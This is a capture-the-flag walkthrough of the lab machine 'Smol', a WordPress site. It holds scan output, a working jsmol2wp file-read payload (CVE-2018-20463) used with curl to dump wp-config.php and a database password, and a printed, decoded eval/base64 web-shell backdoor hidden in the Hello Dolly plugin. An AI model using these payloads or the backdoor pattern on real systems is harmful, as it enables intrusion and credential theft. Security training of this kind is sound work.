Smol
Information Gathering
Port Scanning
┌──(kali💀kali)-[~/temp/Smol]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Open 192.168.10.100:22
Open 192.168.10.100:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL/iO8JI5DrcvPDFlmqtX/lzemir7W+WegC7hpoYpkPES6q+0/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=
| 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://www.smol.hmv
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The HTTP title reports a redirect to http://www.smol.hmv, so map that name locally in /etc/hosts. The directory scan below is also run against the bare smol.hmv, so add both names:
192.168.10.100 smol.hmv www.smol.hmv
Directory Scanning
┌──(kali💀kali)-[~/temp/Smol]
└─$ feroxbuster -u http://smol.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php txt html -s 200 301 302 -d 1
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://smol.hmv
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 301, 302]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, html]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 1
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 0l 0w 0c http://smol.hmv/ => http://www.smol.hmv/
301 GET 0l 0w 0c http://smol.hmv/index.php => http://www.smol.hmv/
301 GET 9l 28w 309c http://smol.hmv/wp-content => http://smol.hmv/wp-content/
200 GET 81l 274w 4537c http://smol.hmv/wp-login.php
200 GET 384l 3177w 19903c http://smol.hmv/license.txt
301 GET 9l 28w 310c http://smol.hmv/wp-includes => http://smol.hmv/wp-includes/
200 GET 394l 768w 6125c http://smol.hmv/wp-admin/css/install.css
200 GET 13l 78w 4373c http://smol.hmv/wp-admin/images/wordpress-logo.png
200 GET 23l 81w 1259c http://smol.hmv/wp-admin/upgrade.php
302 GET 0l 0w 0c http://smol.hmv/wp-admin/ => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2F&reauth=1
302 GET 0l 0w 0c http://smol.hmv/wp-admin/import.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fimport.php&reauth=1
302 GET 0l 0w 0c http://smol.hmv/wp-admin/update-core.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fupdate-core.php&reauth=1
200 GET 17l 82w 1261c http://smol.hmv/wp-admin/install.php
200 GET 98l 836w 7425c http://smol.hmv/readme.html
200 GET 5l 15w 135c http://smol.hmv/wp-trackback.php
301 GET 9l 28w 307c http://smol.hmv/wp-admin => http://smol.hmv/wp-admin/
302 GET 0l 0w 0c http://smol.hmv/wp-signup.php => http://www.smol.hmv/wp-login.php?action=register
[####################] - 8m 882248/882248 0s found:17 errors:0
[####################] - 8m 882184/882184 1953/s http://smol.hmv/
CMS Scanning
It looks like WordPress, so run CMSeeK against it:
┌──(kali💀kali)-[~/temp/Smol]
└─$ cmseek -u http://www.smol.hmv -v
[i] Updating CMSeeK result index...
[*] Report index updated successfully!
___ _ _ ____ ____ ____ _ _
| |\/| [__ |___ |___ |_/ by @r3dhax0r
|___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA
[+] CMS Detection And Deep Scan [+]
[i] Scanning Site: http://www.smol.hmv
[+] User Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
[+] Collecting Headers and Page Source for Analysis
[+] Detection Started
[+] Using headers to detect CMS (Stage 1 of 4)
[*] CMS Detected, CMS ID: wp, Detection method: header
[+] Getting CMS info from database
[+] Starting WordPress DeepScan
[+] Detecting Version and vulnerabilities
[+] Generator Tag Available... Trying version detection using generator meta tag
[*] Version Detected, WordPress Version 6.8.1
[+] Initiating open directory and files check
[+] XML-RPC interface not available
[+] Looking for potential path disclosure
[i] Checking user registration status
[i] Starting passive plugin enumeration
[*] 1 Plugin enumerated!
[i] Starting passive theme enumeration
[+] Looking for theme zip file!
[*] 1 theme detected!
[i] Starting Username Harvest
[i] Harvesting usernames from wp-json api
[!] Json api method failed trying with next
[i] Harvesting usernames from jetpack public api
[!] No results from jetpack api... maybe the site doesn't use jetpack
[i] Harvesting usernames from wordpress author Parameter
[*] Found user from source code: xavi
[*] Found user from source code: diego
[*] Found user from source code: gege
[*] Found user from redirection: admin
[*] Found user from redirection: think
[*] Found user from redirection: wp
[*] 6 Usernames were enumerated
[i] Checking version vulnerabilities using wpvulns.com
[x] Error Retriving data from wpvulndb
___ _ _ ____ ____ ____ _ _
| |\/| [__ |___ |___ |_/ by @r3dhax0r
|___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA
[+] Deep Scan Results [+]
┏━Target: www.smol.hmv
┃
┠── CMS: WordPress
┃ │
┃ ├── Version: 6.8.1
┃ ╰── URL: https://wordpress.org
┃
┠──[WordPress Deepscan]
┃ │
┃ ├── Readme file found: http://www.smol.hmv/readme.html
┃ ├── License file: http://www.smol.hmv/license.txt
┃ ├── Uploads directory has listing enabled: http://www.smol.hmv/wp-content/uploads
┃ │
┃ ├── Plugins Enumerated: 1
┃ │ │
┃ │ ╰── Plugin: jsmol2wp
┃ │ │
┃ │ ├── Version: 14.1.7
┃ │ ╰── URL: http://www.smol.hmv/wp-content/plugins/jsmol2wp
┃ │
┃ │
┃ ├── Themes Enumerated: 1
┃ │ │
┃ │ ╰── Theme: popularfx
┃ │ │
┃ │ ├── Version: 1.2.5
┃ │ ╰── URL: http://www.smol.hmv/wp-content/themes/popularfx
┃ │
┃ │
┃ ├── Usernames harvested: 6
┃ │ │
┃ │ ├── wp
┃ │ ├── think
┃ │ ├── diego
┃ │ ├── gege
┃ │ ├── xavi
┃ │ ╰── admin
┃ │
┃
┠── Result: /home/kali/temp/Smol/Result/www.smol.hmv/cms.json
┃
┗━Scan Completed in 0.88 Seconds, using 45 Requests
CMSeeK says ~ addio
Vulnerability Discovery
Information Gathering
Several usernames and one plugin, jsmol2wp, were found. A first look did not turn up a usable vulnerability for it; note that the 14.1.7 CMSeeK reports is the version string of the bundled JSmol JavaScript library, not of the plugin itself (the plugin's own version is read from its readme.txt further down). Also note that the two tools disagree about XML-RPC: CMSeeK says the interface is not available, while WPScan below finds xmlrpc.php reachable. Run wpscan for a second opinion:
┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan --url http://www.smol.hmv --api-token xxxxxxxxxxxxxxxxxxx
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://www.smol.hmv/ [192.168.10.100]
[+] Started: Fri Jun 6 22:30:50 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://www.smol.hmv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://www.smol.hmv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://www.smol.hmv/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://www.smol.hmv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:03 <============================================================================================================> (702 / 702) 100.00% Time: 00:00:03
[i] The WordPress version could not be detected.
[+] WordPress theme in use: popularfx
| Location: http://www.smol.hmv/wp-content/themes/popularfx/
| Last Updated: 2024-11-19T00:00:00.000Z
| Readme: http://www.smol.hmv/wp-content/themes/popularfx/readme.txt
| [!] The version is out of date, the latest version is 1.2.6
| Style URL: http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5
| Style Name: PopularFX
| Style URI: https://popularfx.com
| Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...
| Author: Pagelayer
| Author URI: https://pagelayer.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5, Match: 'Version: 1.2.5'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 0
| Requests Remaining: 23
[+] Finished: Fri Jun 6 22:30:58 2025
[+] Requests Done: 706
[+] Cached Requests: 609
[+] Data Sent: 191.137 KB
[+] Data Received: 179.346 KB
[+] Memory used: 248.938 MB
[+] Elapsed time: 00:00:07
Scan Aborted: wrong constant name
version_finder_module.const_set(constant_name, Module.new)
^^^^^^^^^^
Trace: /usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `const_set'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `maybe_create_module'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:83:in `create_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:23:in `create_and_load_dynamic_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:16:in `initialize'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `new'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `find'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/models/plugin.rb:34:in `version'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `each'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `enum_plugins'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration.rb:13:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `each'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `block in run'
/usr/lib/ruby/3.1.0/timeout.rb:84:in `timeout'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:45:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:24:in `run'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:17:in `block in <top (required)>'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:15:in `initialize'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `new'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `<top (required)>'
/usr/bin/wpscan:25:in `load'
/usr/bin/wpscan:25:in `<main>'
Handling the Error
A strange error appeared, and I did not know how to resolve it, so I tried upgrading. The trace itself points at the cause: the crash is raised inside WPScan's own dynamic-finder loader (plugin.rb:70, where const_set rejects a plugin slug it cannot turn into a valid Ruby constant name), so it is a tool/data problem rather than anything on the target.
┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo apt-get update && sudo apt-get upgrade
# sudo apt autoremove
But after the upgrade a different error appeared:
┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan
/usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1421:in `block in activate_dependencies': Could not find 'opt_parse_validator' (~> 1.9.5) among 159 total gem(s) (Gem::MissingSpecError)
Checked in 'GEM_PATH=/home/kali/.local/share/gem/ruby/3.1.0:/var/lib/gems/3.1.0:/usr/local/lib/ruby/gems/3.1.0:/usr/lib/ruby/gems/3.1.0:/usr/lib/x86_64-linux-gnu/ruby/gems/3.1.0:/usr/share/rubygems-integration/3.1.0:/usr/share/rubygems-integration/all:/usr/lib/x86_64-linux-gnu/rubygems-integration/3.1.0' at: /usr/share/rubygems-integration/all/specifications/cms_scanner-0.13.9.gemspec, execute `gem env` for more information
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1423:in `block in activate_dependencies'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
from /usr/lib/ruby/vendor_ruby/rubygems.rb:290:in `block in activate_bin_path'
from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `synchronize'
from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `activate_bin_path'
from /usr/bin/wpscan:25:in `<main>'
Searching for a fix turned up a suggestion on GitHub:
https://github.com/wpscanteam/wpscan/issues/1243#issuecomment-489421054
Resolved the same issue. In my fix, I did NOT uninstall anything.
apt-get install ruby-dev
gem install ffi --platform=ruby
gem install yajl-ruby
apt-get install libxslt-dev libxml2-dev
gem install nokogiri -- --use-system-libraries
Then wpscan worked.
But that did not fully resolve it. No worries, I'll switch to a different Kali box later.
(The second error states the cause plainly: the apt upgrade left cms_scanner 0.13.9 in place while the opt_parse_validator ~> 1.9.5 gem it depends on is no longer installed. The recipe above only rebuilds native gems such as ffi and nokogiri, so it does not touch that missing dependency.)
Plugin Exploitation
Search for known vulnerabilities in the plugin; first pin down its version:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/ | html2text
****** Index of /wp-content/plugins/jsmol2wp ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[ ]] JSmol.min.js 2023-08-16 20:24 224K
[[ ]] JSmol.min.nojq.js 2023-08-16 20:24 129K
[[ ]] add-textdomain.php 2023-08-16 20:24 4.6K
[[ ]] class.jsMol2wp.php 2023-08-16 20:24 9.8K
[[DIR]] css/ 2023-08-16 20:22 -
[[TXT]] help.htm 2023-08-16 20:24 9.0K
[[DIR]] idioma/ 2023-08-16 20:22 -
[[DIR]] images/ 2023-08-16 20:22 -
[[DIR]] j2s/ 2023-08-16 20:22 -
[[ ]] jsmol2wp.php 2023-08-16 20:24 2.4K
[[TXT]] jsmol_template.htm 2023-08-16 20:24 2.0K
[[DIR]] php/ 2023-08-16 20:22 -
[[TXT]] readme.txt 2023-08-16 20:24 5.2K
[[TXT]] simple.htm 2023-08-16 20:24 6.3K
[[TXT]] updating_jsmol2wp.txt 2023-08-16 20:24 475
===========================================================================
Apache/2.4.41 (Ubuntu) Server at www.smol.hmv Port 80
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
=== JSmol2WP ===
Contributors: Jim Hu
Tags: shortcodes, JSmol, Jmol, molecular graphics, PDB
Requires at least: 3.0
Tested up to: 4.9.4
Donate link: http://biochemistry.tamu.edu/index.php/alum/giving/
Stable tag: 1.07
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html
Text domain: jsmol2wp
Domain path: /languages/

Plugin to place JSmol molecular graphics applets in WordPress posts or pages.

== Description ==
This shortcode plugin places JSmol applets in WordPress posts and pages. Use [jsmol pdb='accession'] for a minimal version. jsmol2wp will look to see if a pdb file has been uploaded to your wordpress and it will use that file if it can find it. If it can't find a matching post for an uploaded attachement, it will try http://rcsb.org/pdb. If it can't find a match there either, you'll get an error message in the JSmol window. Additional information on optional parameters are at the About/Help link in the applets.
This plugin was developed for use on the website for the Department of Biochemistry and Biophysics at Texas A&M University (http://biochemistry.tamu.edu).

== Installation ==
Place in the plugins directory and activate. No additional files or configurations are needed.
Thanks to Bob Hanson and the JMol team for making the javascript code for jsmol available. See: http://chemapps.stolaf.edu/jmol/jsmol http://wiki.jmol.org/index.php/Jmol_JavaScript_Object
This plugin also benefited from using Jaime Prilusky's mediawiki extension for inspiration http://proteopedia.org/support/JSmolExtension/

== Upgrade Notice ==
Version 1.03 updates the Jmol libraries and fixes a bug with the load parameter

== Frequently Asked Questions ==
= Is there an example of an installation? =
See http://jimhu.org/jsmol2wp-plugin-released-at-wordpress-org/
= Where can I learn more about what JSmol can do? =
Jmol documentation can be found at http://jmol.sourceforge.net/#Learn%20to%20use%20Jmol and http://jmol.sourceforge.net/docs/JmolUserGuide/

== Screenshots ==
1. Applet for a protein.
2. Applet for a small molecule.

== Changelog ==
= 1.07 =
fix extremely stupid svn error where needed files from the j2s directory were not in the repo
= 1.06 =
change rcsb file path to avoid redirect
= 1.05 =
load rcsb pdb files via https instead of http
= 1.04 =
* updated jsmol package from Jmol sourceforge
* first attempt at internationalization
** Added idioma directory from jsMol distributions
** Added set language directive based on wordpress get_locale()
= 1.03 =
* updated jsmol package from Jmol sourceforge
* Remove beta from help.htm
* fix bug where load param was not working
= 1.02 =
* fixes to this readme.txt file to improve the display at the wordpress.org plugin repository
= 1.01 =
* tweaks for wordpress.org deposition
= 1.0 =
* update JSmol code to 14.3.12_2015.01.28
* prepare for release to wordpress.org plugin repository
= 0.94 beta =
* add isosurface support
* rewrite the code to set up structure loading
* replace WP get_page_by_title with a function that matches the filename
* add jvxl to file types
* fixed bug where caption nonmatching required casting match as a string.
* move the help demo page to a more stable URL.
= 0.93 beta =
* set default type based on fileurl extension if present
* fix bug where reset button failed with data from fileurl
= 0.92 beta =
* change appletID to not require $acc.
= 0.9 beta =
* improve help page
* improve uniqueness identifiers for multiple Jmolapplets on the same post/page; add the option to hand code instances
* improve debug messages (or at least change them)
* make reset button standard and have it remember the load commands
* standard buttons depend on the type of molecule loaded.
* add some semicolons to the template to try to fix lint warnings: http://www.javascriptlint.com/online_lint.php
= 0.8 beta =
* removed data directory
* changed system for counting instances of the shorttag so we don't need preg_match
* removed whitespace from template hoping that solves the problem of themes adding markup
* simplified load script as suggested by Bob Hansen
* made applet IDs more unique by appending post id
= 0.7 beta =
* update jsmol libraries to 4.1.7_2014.06.09
* add dependencies for jquery-ui-core and jquery-ui-menu fixes popup problem in some themes
* refactor to support additional file types (in progress)
* fix multiline regex bug
* fix bug that caused failure to load when permalinks used ?p=post_number format
* debug constructor
* debug view
..* add path to uploaded file
..* add test for get_page_by_title
= 0.6 alpha =
* register script before enqueueing it.
* added ability to add Jmol.script commands
* added the ability to add jmolCommandInput
= 0.5 alpha =
* added wrap and debug options
= 0.4 alpha =
* changed to nojq.
* modified command processing to not split on allowed characters in Jmol syntax.
= 0.3 alpha =
* changed default to spin off in order to save client cpu
* custom command buttons working.
= 0.2 alpha =
* changed system to use a template based on the distro file simple1.htm.
* added captioning
* works with local or remote pdb files from rcsb.org/pdb
= 0.1 pre-alpha =
* basic shortcode working with uploaded pdb file
* adds .pdb chemical/pdb mime type to allowed mime types
* handles multiple shortcodes on the same page
The Stable tag gives the plugin version: 1.07 (CMSeeK's 14.1.7 is the bundled JSmol library's version, so searching on that number leads nowhere). readme.txt is plain text, so it is fetched here without the html2text filter used for the directory listing; piping it through html2text is what collapses its line structure. Look the version up:
Searching on 1.07 turns up a known arbitrary file read in the plugin's php/jsmol.php (CVE-2018-20463): when call=getRawDataFromDatabase, the query parameter is opened as a file path with no restriction to the plugin's own directory, so ../ traversal and php:// stream wrappers reach anything the web server user can read. The payload, written as a nuclei-style template with {{BaseURL}} standing for the site root:
{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
Against wp-config.php it returns the whole file:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
which leaks the database credentials:
wpuser
kbLSF2Vop#lw3rjDZ629*Z%G
Try them on the WordPress login at http://www.smol.hmv/wp-admin (it redirects to wp-login.php). The database user name wpuser also exists as a WordPress account, so the password may well have been reused:
Login succeeds, so it was. Inside, a private page titled "Webmaster Tasks!!" holds some useful leads:
# Webmaster Tasks!! — Private
1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of "Hello Dolly" plugin as the site's code revision.
2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.
3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.
4- Strong Passwords: Enforce strong passwords for users and administrators.
5- Input Validation: Validate and sanitize user inputs to prevent attacks like SQL injection and XSS.
6- [IMPORTANT] Firewall Installation: Install a web application firewall (WAF) to filter incoming traffic.
7- Backup Strategy: Set up regular backups of your website and databases.
8- [IMPORTANT] User Permissions: Assign minimum necessary permissions to users based on roles.
9- Content Security Policy: Implement a CSP to control resource loading and prevent malicious scripts.
10- Secure File Uploads: Validate file types, use secure upload directories, and restrict execution permissions.
11- Regular Security Audits: Conduct routine security assessments, vulnerability scans, and penetration tests.
It names the Hello Dolly plugin as a suspected backdoor, so look at its source. Hello Dolly ships as a single file, wp-content/plugins/hello.php, rather than in its own directory; read it through the same file-read bug (two ../ from the plugin's php/ directory reach wp-content/plugins/):
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php"
<?php
/**
* @package Hello_Dolly
* @version 1.7.2
*/
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/
function hello_dolly_get_lyric() {
/** These are the lyrics to Hello Dolly */
$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";
// Here we split it into lines.
$lyrics = explode( "\n", $lyrics );
// And then randomly choose a line.
return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}
// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
$chosen = hello_dolly_get_lyric();
$lang = '';
if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
$lang = ' lang="en"';
}
printf(
'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
$lang,
$chosen
);
}
// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );
// We need some CSS to position the paragraph.
function dolly_css() {
echo "
<style type='text/css'>
#dolly {
float: right;
padding: 5px 10px;
margin: 0;
font-size: 12px;
line-height: 1.6666;
}
.rtl #dolly {
float: left;
}
.block-editor-page #dolly {
display: none;
}
@media screen and (max-width: 782px) {
#dolly,
.rtl #dolly {
float: none;
padding-left: 0;
padding-right: 0;
}
}
</style>
";
}
add_action( 'admin_head', 'dolly_css' );
Decode the base64 string:
┌──(kali💀kali)-[~/temp/Smol]
└─$ echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 -d
if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }
The two escaped keys, the one inside isset() and the one inside system(), look alike; resolve them:
┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\155\x64"
cmd
┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\x6d\144"
cmd
